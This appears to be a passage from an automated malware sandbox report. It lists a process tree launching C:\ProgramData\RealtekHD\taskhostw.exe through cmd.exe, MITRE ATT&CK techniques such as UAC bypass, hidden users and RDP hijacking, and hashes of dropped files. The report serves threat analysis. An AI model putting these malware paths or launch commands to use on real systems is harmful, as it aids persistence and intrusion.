                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2696

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Resource Development

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1059

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PowerShell

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1059.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Services

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1569

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Service Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1569.002

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Account Manipulation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1098

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1543

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Windows Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1543.003

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1546

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1546.007

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Server Software Component

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1505

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Terminal Services DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1505.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1548

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1548.002

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Account Manipulation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1098

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1547.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1543

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Windows Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1543.003

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1546

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1546.007

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1548

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1548.002

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Hide Artifacts

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1564

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1564.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Hidden Users

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1564.002

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Impair Defenses

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1562

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1562.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1562.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Browser Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1217

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Password Policy Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1201

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Permission Groups Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1069

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Local Groups

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1069.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Location Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1614

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Language Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1614.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Remote Service Session Hijacking

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1563

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                RDP Hijacking

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1563.002

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Service Stop

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1489

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c5ec8996fc800325262f5d066f5d61c9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  95f8e486960d1ddbec88be92ef71cb03a3643291

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f9a9b17c831721033458d59bf69f45b6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  472313a8a15aca343cf669cfc61a9ae65279e06b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\winlogon.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  35KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2f6a1bffbff81e7c69d8aa7392175a72

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  94ac919d2a20aa16156b66ed1c266941696077da

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\install.vbs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  140B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5e36713ab310d29f2bdd1c93f2f0cad2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7e768cca6bce132e4e9132e8a00a1786e6351178

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\reg1.reg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  12KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  806734f8bff06b21e470515e314cfa0d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d4ef2552f6e04620f7f3d05f156c64888c9c97ee

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\winit.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  961KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  03a781bb33a21a742be31deb053221f3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3951c17d7cadfc4450c40b05adeeb9df8d4fb578

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Programdata\Windows\install.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  418B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  db76c882184e8d2bac56865c8e88f8fd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fc6324751da75b665f82a3ad0dcc36bf4b91dfac

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  280B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9a1d48286ce97f5ce9bb99ff9b214ed5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f185dae5f66c2d622bd1fefeaa30223f737a67e7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0cf61088061592d94572c01fc6e6009cca561f2c3fdaacf76b6895964ad6e7a9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d1125f928650766c4fa2f12e614cd2f6de47b650cd56e8770e91cedff4edd03bea4229c9962dfc4778c2e55a7e39a959fb61cc16f4689830c157c93dd6934e0a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000007.log
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  21KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f7fbf64e30c2ddeaf62dcc384cec5463

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  297d888836795fbf336d0d1ab8ce08054a327204

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d356ac3c8e644e0665f51f1ab542a6634b6ef52004021b624d7f25aebc5e530e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d643f7a0c0a489aeadf067240a49865c33268925eb858e45288c7cf8642fb4ce920dfac2edbe28b7a53046ad4e1ad8ed5573c2128957a6e047addb0aa30f5100

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

